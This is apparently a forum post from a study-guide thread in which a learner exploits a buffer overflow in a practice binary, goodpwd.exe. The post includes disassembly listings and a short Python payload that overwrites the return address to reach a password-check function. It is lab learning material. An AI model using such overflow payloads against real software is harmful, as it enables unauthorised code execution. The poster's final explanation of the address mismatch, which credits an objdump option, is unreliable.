Understanding Buffer Overflows - Study Guide

I’m facing an issue when trying to exploit the buffer overflow of the goodpwd.exe.

This is my environment:

  • Virtual box with windows7
  • MSYS2 32bit
  • Immunity debugger

My objdump output:

004015ec <__Z11bf_overflowPc>:
  4015ec:	55                   	push   ebp
  4015ed:	89 e5                	mov    ebp,esp
  4015ef:	83 ec 28             	sub    esp,0x28
  4015f2:	8b 45 08             	mov    eax,DWORD PTR [ebp+0x8]
  4015f5:	89 44 24 04          	mov    DWORD PTR [esp+0x4],eax
  4015f9:	8d 45 ee             	lea    eax,[ebp-0x12]
  4015fc:	89 04 24             	mov    DWORD PTR [esp],eax
  4015ff:	e8 e4 6b 00 00       	call   4081e8 <_strcpy>
  401604:	b8 00 00 00 00       	mov    eax,0x0
  401609:	c9                   	leave  
  40160a:	c3                   	ret    

0040160b <__Z13good_passwordv>:
  40160b:	55                   	push   ebp
  40160c:	89 e5                	mov    ebp,esp
  40160e:	83 ec 18             	sub    esp,0x18
  401611:	c7 04 24 44 a0 40 00 	mov    DWORD PTR [esp],0x40a044
  401618:	e8 93 ff ff ff       	call   4015b0 <__ZL6printfPKcz>
  40161d:	c7 04 24 60 a0 40 00 	mov    DWORD PTR [esp],0x40a060
  401624:	e8 87 ff ff ff       	call   4015b0 <__ZL6printfPKcz>
  401629:	90                   	nop
  40162a:	c9                   	leave  
  40162b:	c3                   	ret    

0040162c <_main>:
  40162c:	55                   	push   ebp
  40162d:	89 e5                	mov    ebp,esp
  40162f:	83 e4 f0             	and    esp,0xfffffff0
  401632:	83 ec 20             	sub    esp,0x20
  401635:	e8 66 01 00 00       	call   4017a0 <___main>
  40163a:	c7 44 24 1c 00 00 00 	mov    DWORD PTR [esp+0x1c],0x0
  401641:	00 
  401642:	c7 04 24 81 a0 40 00 	mov    DWORD PTR [esp],0x40a081
  401649:	e8 62 ff ff ff       	call   4015b0 <__ZL6printfPKcz>
  40164e:	8b 45 0c             	mov    eax,DWORD PTR [ebp+0xc]
  401651:	83 c0 04             	add    eax,0x4
  401654:	8b 00                	mov    eax,DWORD PTR [eax]
  401656:	89 04 24             	mov    DWORD PTR [esp],eax
  401659:	e8 8e ff ff ff       	call   4015ec <__Z11bf_overflowPc>
  40165e:	83 7c 24 1c 01       	cmp    DWORD PTR [esp+0x1c],0x1
  401663:	75 07                	jne    40166c <_main+0x40>
  401665:	e8 a1 ff ff ff       	call   40160b <__Z13good_passwordv>
  40166a:	eb 0c                	jmp    401678 <_main+0x4c>
  40166c:	c7 04 24 9d a0 40 00 	mov    DWORD PTR [esp],0x40a09d
  401673:	e8 38 ff ff ff       	call   4015b0 <__ZL6printfPKcz>
  401678:	c7 04 24 b2 a0 40 00 	mov    DWORD PTR [esp],0x40a0b2
  40167f:	e8 2c ff ff ff       	call   4015b0 <__ZL6printfPKcz>
  401684:	b8 00 00 00 00       	mov    eax,0x0
  401689:	c9                   	leave  
  40168a:	c3

Immunity debugger

00EE15EC  /$ 55             PUSH EBP
00EE15ED  |. 89E5           MOV EBP,ESP
00EE15EF  |. 83EC 28        SUB ESP,28
00EE15F2  |. 8B45 08        MOV EAX,DWORD PTR SS:[EBP+8]             ; |
00EE15F5  |. 894424 04      MOV DWORD PTR SS:[ESP+4],EAX             ; |
00EE15F9  |. 8D45 EE        LEA EAX,DWORD PTR SS:[EBP-12]            ; |
00EE15FC  |. 890424         MOV DWORD PTR SS:[ESP],EAX               ; |
00EE15FF  |. E8 E46B0000    CALL <JMP.&msvcrt.strcpy>                ; \strcpy
00EE1604  |. B8 00000000    MOV EAX,0
00EE1609  |. C9             LEAVE
00EE160A  \. C3             RETN
00EE160B  /$ 55             PUSH EBP
00EE160C  |. 89E5           MOV EBP,ESP
00EE160E  |. 83EC 18        SUB ESP,18
00EE1611  |. C70424 44A0EE0>MOV DWORD PTR SS:[ESP],goodpwd.00EEA044  ;  ASCII "Valid password supplied
"
00EE1618  |. E8 93FFFFFF    CALL goodpwd.00EE15B0
00EE161D  |. C70424 60A0EE0>MOV DWORD PTR SS:[ESP],goodpwd.00EEA060  ;  ASCII "This is good_password function 
"
00EE1624  |. E8 87FFFFFF    CALL goodpwd.00EE15B0
00EE1629  |. 90             NOP
00EE162A  |. C9             LEAVE
00EE162B  \. C3             RETN
00EE162C  /$ 55             PUSH EBP
00EE162D  |. 89E5           MOV EBP,ESP
00EE162F  |. 83E4 F0        AND ESP,FFFFFFF0
00EE1632  |. 83EC 20        SUB ESP,20
00EE1635  |. E8 66010000    CALL goodpwd.00EE17A0
00EE163A  |. C74424 1C 0000>MOV DWORD PTR SS:[ESP+1C],0
00EE1642  |. C70424 81A0EE0>MOV DWORD PTR SS:[ESP],goodpwd.00EEA081  ;  ASCII "You are in goodpwd.exe now
"
00EE1649  |. E8 62FFFFFF    CALL goodpwd.00EE15B0
00EE164E  |. 8B45 0C        MOV EAX,DWORD PTR SS:[EBP+C]
00EE1651  |. 83C0 04        ADD EAX,4
00EE1654  |. 8B00           MOV EAX,DWORD PTR DS:[EAX]
00EE1656  |. 890424         MOV DWORD PTR SS:[ESP],EAX
00EE1659  |. E8 8EFFFFFF    CALL goodpwd.00EE15EC
00EE165E  |. 837C24 1C 01   CMP DWORD PTR SS:[ESP+1C],1
00EE1663  |. 75 07          JNZ SHORT goodpwd.00EE166C
00EE1665  |. E8 A1FFFFFF    CALL goodpwd.00EE160B
00EE166A  |. EB 0C          JMP SHORT goodpwd.00EE1678
00EE166C  |> C70424 9DA0EE0>MOV DWORD PTR SS:[ESP],goodpwd.00EEA09D  ;  ASCII "Invalid Password!!!
"
00EE1673  |. E8 38FFFFFF    CALL goodpwd.00EE15B0
00EE1678  |> C70424 B2A0EE0>MOV DWORD PTR SS:[ESP],goodpwd.00EEA0B2  ;  ASCII "Quitting sample1.exe
"
00EE167F  |. E8 2CFFFFFF    CALL goodpwd.00EE15B0
00EE1684  |. B8 00000000    MOV EAX,0
00EE1689  |. C9             LEAVE
00EE168A  \. C3             RETN


Has we can see already the addresses differ.

Taking in consideration the objdump addresses and using a python script like the one below It never works, it seems I can’t jump correctly to the function goodpwd.

from importlib.resources import path
import os
import sys

payload = "\x41"*22
payload += "\x0b\x16\x40"

command = "goodpwd.exe %s" %(payload)

print(path)
print (command)
os.system(command)

I don’t know why immunity debugger assigns different addresses in comparison with the objdump, but the python script is not working. when using the helper.cpp and changing the address to the one mention on the objdump it also fails.

Any suggestion, is this related to be using a virtual environment, or MSYS2 instead of using mingw compiler?

Thank you

I was able to exploit the BOF by pointing to the address that appears in immunity.
After some troubleshooting I found that the culprit was the options used with objdump.
Probably this is related to the virtual box software.

When using objdump with the option -Mintel it gives a different result when compared to immunity debugger, but if I use the -Mi386 the result is exactly the same.

objdump -d -Mi386 is the correct option with a windows7 VM using virtual box.